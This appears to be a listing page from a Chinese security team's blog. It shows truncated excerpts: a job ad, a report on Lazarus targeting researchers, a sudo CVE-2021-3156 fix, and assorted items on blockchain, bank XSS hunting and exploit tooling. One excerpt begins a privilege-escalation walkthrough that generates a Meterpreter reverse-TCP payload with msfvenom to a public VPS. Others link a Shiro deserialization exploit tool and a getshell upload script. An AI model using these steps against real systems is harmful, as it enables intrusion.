14x Security Team

蚂蚁金融云诚招安全专家公司简介蚂蚁集团是中国最大的移动支付平台支付宝的母公司，也是全球领先的金融科技开放平台，致力于以科技推动包括金融服务业在内的全球现代服务业的数字化升级，携手合作伙伴为消费者和小微企业提供普惠、绿色、可持续的服务，为世界带来微小而美好的改变。岗位名称：安全专家岗位职责：1.负责蚂蚁金融云以及OB的安全需求评审，安全测试；2.负责蚂蚁金融云以及OB 安全监控部署；3.负责金融云和OB安全监控与运营，应急响应；任职要求（专业能力要求满足一项即可）：专业能力要求...

APT追踪：当黑客不讲武德，安全专家也容易被骗事件影响26日，谷歌威胁分析小组披露了一系列来自东北亚某国黑客组织的针对安全研究人员(尤其是漏洞研究人员)的攻击活动。攻击者使用疑似Lazarus APT组织的攻击基础设施，结合非常具有迷惑性的社工操作，骗取受害者信任，并可能以盗取安全公司电脑上的高价值漏洞研究资料达到攻击目的。目前国内已有一定数量的安全研究人员受到这个组织的欺骗，其研究电脑的敏感信息泄露。技巧攻击攻击者为了与安全研究者建立互信并保持联系，首先会在一些社交...

CentOS升级sudo版本，解决Sudo权限绕过漏洞 修复堆缓冲区溢出漏洞(CVE-2021- 3156)漏洞介绍关于 Sudo 堆缓冲区溢出漏洞(CVE-2021- 3156)的预警通知有关情报显示，sudo 存在缓冲区溢出漏洞。攻击者在取得服 务器基础权限的情况下，可以利用 sudo 基于堆的缓冲区溢出漏 洞，获得 root 权限。在 sudo 解析命令行参数的方式中发现了基 于堆的缓冲区溢出。任何本地用户(普通用户和系统用户，sudo er 和非 sudoer...

记一次靶机漏洞的getshell逻辑代码分析过程首先是parmas变量类型函数，指向useraccount,实际上看到JcResetPass_checkSafeInfo.action是用来校验的地址那么实际上，我们只需要看这里，初始化变量type，如果data的结果为空，var _processing = false; var type = "0"; var submitType;  function change(type){  if...

记一次ms16075邪恶土豆提权windows2012服务器过程匿名权限2012服务器服务器系统是window2012的需要准备一台vps公网服务器，和一台kali虚拟机进行映射通信kali设置frp代理规则server填写公网服务器IP然后在在VPS启动frpKali转发6666到公网的1234端口配合MSF进行反弹开启kali的frp由MSF生成木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=6...

old Team getshell上传工具，实现单个上传exp，和自动上传post功能漏洞由old Team发现的通用getshell漏洞，为了方便，写个工具测试...

import urllib.request import re headers ={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4...

区块链技术的八大核心功能介绍 1、去中心化去中心化（Decentralization）是区块链最根本的性质，也是区块链区别于其他分布式账本的最重要因素，尽管这一点还存有争议。去中心化通常与中心化（CentralizaTIon）、分布式（Distributed）进行比较。以太坊创始人Vitalik Buterin在《去中心化的真正含义》一文中详细阐述了去中心化的概念，从网络架构、治理体制、逻辑结构三个维度进行了分析，指出区块链在网络架构和治理体制上是去中心化的，没有人...

好久没写文章了，分享一个银行XSS漏洞挖掘技巧过程PS:明年可能去XX或者XX深造深造众所周知，银行的业务系统，是很安全的，不管是接口还是其他的服务，都相对比较成熟，很难挖到有价值的漏洞今天有空写篇文章，简单分享一个银行XSS漏洞,逻辑漏洞技巧挖掘过程以前也挖过银行类的漏洞，都是有保密协议的首先我们得到的目标是一个微信公众号，在这里我们可以随便点开一个页面，获得连接，这时候我们需要发包工具进行测试推荐：fidder,很方便抓到一个地址发现是一个POST方法，token接口，意...

Shiro_exploit-master shiro反序列化漏洞利用工具https://pan.baidu.com/s/1qK__lV_YEhdNs15z_GpFLA 提取码: aguv...